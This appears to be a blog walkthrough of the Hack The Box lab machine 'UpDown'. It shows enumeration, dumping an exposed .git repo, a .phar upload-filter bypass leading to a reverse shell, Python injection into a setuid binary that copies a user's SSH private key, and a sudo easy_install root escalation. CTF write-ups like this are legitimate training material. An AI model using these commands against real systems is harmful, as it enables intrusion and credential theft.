UpDown Hack the Box Walkthrough

Tamilcode 0
Updown hack the box

Hey Guys Welcome to Another tremendous writeup Today We going to discuss about Updown Hack the box machine which comes up with file upload vulnerability and sudo binary to get the root privilege 


So Let's Get Started 

As usual first we start up with a Nmap scan 

Enumernation

STEP 1: nmap -sC -sV 10.10.11.177


updown hack the box writeup


Further analysis of this nmap report shows the usual ports and services which are SSH 22 and HTTP 80 

And there is a version of apache which is 

After that, I visited the website which is http://10.10.11.177 and I found the hostname 
Updown htb writeup

Let's Add the hostname to the /etc/host file 


So next I enumerate the web page using dirsearch 

STEP 2: dirsearch -u http://siteisup.htb


Further analyzing this report I found the /dev which is interesting  

And again I enumerated that web page using the dirsearch 

STEP 3: dirsearch -u http://siteisup.htb/dev 

And I found the sensitive directory which is .git 


After that, I dump that directory into my local machine using git-dumper


Download git-dumper using this command: pip install git-dumper

STEP 4: git-dumper http://10.10.11.177/dev/.git ~/Updown



Now the git files will be saved in the Updown directory 

After that, I analyzed that repo in gitkraken It fantastic tool to analyze this git repo.
so open the Updown directory in that tool 

Download this tool using the below link

Further analyzing that file I have found the dev vhost 



And I found one weird header which is "special-Dev: only4dev" in .htaccess file




So first add the vhost to your /etc/hosts file which is dev.siteisup.htb

After that open that website in the browser and you get the Forbidden error because we want to add the header in that request so open burpsuite and go to the options category Now you can able match and replace 

Here we want to add that header special-Dev: only4dev



After that turn off your intercept and reload that page you get the admin panel



Now you can able to see the admin panel and here there is file uploading feature 

So I went back to the git repo and I found something interesting in checker.php 




Further analyzing this code I found that the file size should be less than 10 KB and we cannot able upload the PHP, py, pl, phtml, HTML, etc

File Upload Vulnerblity 

Interesting but the whitelisting in this method is bad behavior so I found another extension for PHP which .phar

So now we going to create our payload using .phar

First, create our simple payload 

<?php
phpinfo()
?>

Next, save this payload in the .phar extension before that we want to compress that file using truncate

STEP 5: truncate --size 9KB hacked.phar

Updown htb writeup

And upload that file to the website And Intercept that request using burpsuite

After that Edit that request and setup your listener using netcat because we want to keep the connection alive website otherwise the file won't be uploaded



STEP 6: nc -lvp 5050



After that send the request to the repeater and send it 



Next check the uploads directory because it will be uploaded on that 



Open that directory Now you can able to see the uploaded file 




And click that file you can able to see the PHP information 

Boooooommmmm!!! It's Working!!!

updown htb php


Further analyzing this information I found that a lot of function has been disabled 

updown htb disable function


So Above with that disable_function, I have drafted the payload you can able download using the below link

In that payload replace your my IP with your Ip address 

Updown htb machine


And set up the two listeners one for transferring that file and another one for getting a reverse shell 


For transferring that file

STEP 7: nc -lvp 5050 


For reverse connection 

STEP 8: nc -lvp 9001



Next, upload that file and intercept the request and send the request using the repeater

Updown htb


Next, go to the uploads directory and click that payload




Boooooooommmm!!!!!

Now you will get the shell

 


After getting the shell access to the user.txt but it showed permission denied



Further analyzing this machine I found something interesting which is /dev/siteisup and it is a binary file 

After decompiling that file I found that this file has access to the developer so now using this we going to get the ssh key of that user 


So first run this binary 

STEP 9: ./siteisup

Next enter this command:
__import__('os').system('cat /home/developer/.ssh/id_rsa >> /tmp/id_rsa')
Updown htb walkthrough python



And next, go to the /tmp folder you can able to see the id_rsa file and transfer that file using the python server 

STEP 10: python3 -m http.server 4040


Go to your local machine 

STEP 11: wget http://10.10.11.177:4040/id_rsa



User Flag


STEP 12: chmod 600 id_rsa 

STEP 13: ssh -i id_rsa developer@10.10.11.177

Updown htb walkthrough ssh


Booooooooooooooooommmm!!!

Now you will get the user shell and userflag

STEP 14: cat user.txt 

Updown htb userflag
So next we going to take over the root flag of that machine 

Root Flag

After getting the user flag next we going to get the root flag by abusing the sudo binary 

STEP 15: sudo -l


Now get the easy_install binary which is at the root with no password 

So next I went for gtfobins for checking this binary 

Updown htb rootflag



STEP 16: TF=$(mktemp -d)

STEP 17: echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py

STEP 18: sudo easy_install $TF

Booooooooommmmm!!!!!!

Now you will get the root shell of that machine

STEP 19: cat root.txt


I hope you will understand this article if you like this writeup please donate to us 





Tags

Tamilcode

I'm Vignesh from Chennai I would like to like explore something new in this cyber security field

Post a Comment

Post a Comment

Previous Post Next Post